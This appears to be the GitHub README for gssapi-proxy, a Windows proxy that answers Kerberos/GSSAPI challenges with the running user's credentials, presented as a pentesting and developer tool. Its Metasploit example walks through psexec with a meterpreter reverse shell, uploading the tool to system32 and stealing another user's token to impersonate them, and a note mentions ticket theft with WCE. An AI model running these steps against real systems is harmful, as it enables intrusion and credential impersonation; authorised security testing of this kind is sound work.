https://github.com/mikkolehtisalo/gssapi-proxy

GSSAPI/Kerberos proxy

README
Gssapi-proxy
============

Simple HTTP proxy for Windows. Uses the running user's Kerberos login to respond to Kerberos/GSSAPI challenges (401 with Www-Authenticate) on behalf of the client. Potentially useful for pentesting, and for developers working with Kerberos/GSSAPI. Implemented in Go, using SSPI. Highly extensible.

Tested on Windows 8.1 (32-bit), with a Heimdal KDC and MIT's implementation of the GSSAPI libraries at the other end. Should run on Windows 2000 and later, and may fall back to NTLM if building the Kerberos context fails.

Building
--------

The following command should build the application. The resulting binary is a little large, but it should not require any dependencies on the target systems.

```
go build src\gssapi-proxy.go
```

Metasploit example
------------------

The following example exploits another user's host and runs the proxy remotely.

```
use exploit/windows/smb/psexec
set payload windows/meterpreter/reverse_tcp
set rhost x.x.x.x
set smbdomain localdomain
set smbuser user
set smbpass password
exploit
# ... elevate to Administrator / SYSTEM
upload gssapi-proxy.exe /windows/system32/gssapi-proxy.exe
# Pick process that belongs to the user that has valid kerberos tickets!
ps
steal_token PID
getuid
# Should show correct user
shell
cd /windows/system32/
gssapi-proxy.exe
# Should work, connect your browser to the proxy
# ....
# Reverse back to admin/system when you are done
rev2self
```

Notes
-----

* You must run the application as a user that has a valid Kerberos login and tickets. Although tickets can later be stolen (at least WCE 1.2+ can do that) and moved to other computers, they cannot initially be generated without authenticating against the KDC.
* Only the most common flags are set when generating tokens. For instance, delegation (ISC_REQ_DELEGATE) is not allowed for Kerberos keys by default. Please see the SSPI [documentation](http://msdn.microsoft.com/en-us/library/Windows/desktop/aa375509(v=vs.85).aspx) for more information if you run into problems.
* Does not reply to mutual authentication requests, but it's probably somewhat rare to bump into those with web applications.
* 64-bit platforms should still offer a 32-bit compatible library/API, so the application should compile and work. There's AFAIK no reason why the application would need to be 64-bit.
* The application does not add proxy headers, and does not intentionally manipulate any headers other than Www-Authenticate/Authorization.